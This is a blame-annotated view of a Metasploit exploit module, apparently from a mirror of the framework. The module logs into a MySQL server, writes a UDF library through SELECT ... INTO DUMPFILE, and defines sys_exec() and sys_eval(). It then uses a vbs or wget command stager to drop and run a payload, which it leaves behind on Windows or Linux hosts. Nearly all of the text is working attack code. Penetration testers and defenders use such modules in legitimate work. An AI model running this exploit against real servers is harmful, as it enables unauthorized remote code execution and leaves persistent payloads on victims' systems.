Files
metasploit-gs/modules/exploits/multi/mysql/mysql_udf_payload.rb
T

106 lines
3.3 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::MYSQL
2014-02-07 18:46:19 -06:00
include Msf::Exploit::CmdStager
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(
update_info(
info,
2017-11-03 05:26:05 -04:00
'Name' => 'Oracle MySQL UDF Payload Execution',
2014-02-08 16:31:06 -06:00
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On
default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
permissions not enforced, and the MySQL service runs as LocalSystem.
2014-02-08 16:31:06 -06:00
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
and sys_exec() functions.
},
'Author' =>
[
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
2017-11-03 05:26:05 -04:00
'todb', # this Metasploit module
'h00die' # linux addition
2014-02-08 16:31:06 -06:00
],
'License' => MSF_LICENSE,
'References' =>
[
# Bernardo's work with cmd exec via udf
2015-10-27 12:41:32 -05:00
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
2014-02-08 16:31:06 -06:00
],
2017-11-03 05:26:05 -04:00
'Platform' => ['win', 'linux'],
2014-02-08 16:31:06 -06:00
'Targets' =>
[
2017-11-03 05:26:05 -04:00
[ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
[ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
2014-02-08 16:31:06 -06:00
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
2013-08-30 16:28:54 -05:00
))
register_options(
[
OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
])
end
def post_auth?
true
end
2013-08-30 16:28:54 -05:00
def username
datastore['USERNAME']
end
2013-08-30 16:28:54 -05:00
def password
datastore['PASSWORD']
end
2013-08-30 16:28:54 -05:00
def login_and_get_sys_exec
m = mysql_login(username,password,'mysql')
return if not m
@mysql_arch = mysql_get_arch
@mysql_sys_exec_available = mysql_check_for_sys_exec()
if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
mysql_add_sys_exec
@mysql_sys_exec_available = mysql_check_for_sys_exec()
else
print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
end
2013-08-30 16:28:54 -05:00
return m
end
2013-08-30 16:28:54 -05:00
def execute_command(cmd, opts)
mysql_sys_exec(cmd, datastore['VERBOSE'])
end
2013-08-30 16:28:54 -05:00
def exploit
m = login_and_get_sys_exec()
2013-08-30 16:28:54 -05:00
if not m
return
2017-11-03 05:26:05 -04:00
elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
2013-08-30 16:28:54 -05:00
print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
return
else
if @mysql_sys_exec_available
execute_cmdstager({:linemax => 1500, :nodelete => true})
handler
else
print_status("MySQL function sys_exec() not available")
return
end
end
disconnect
end
end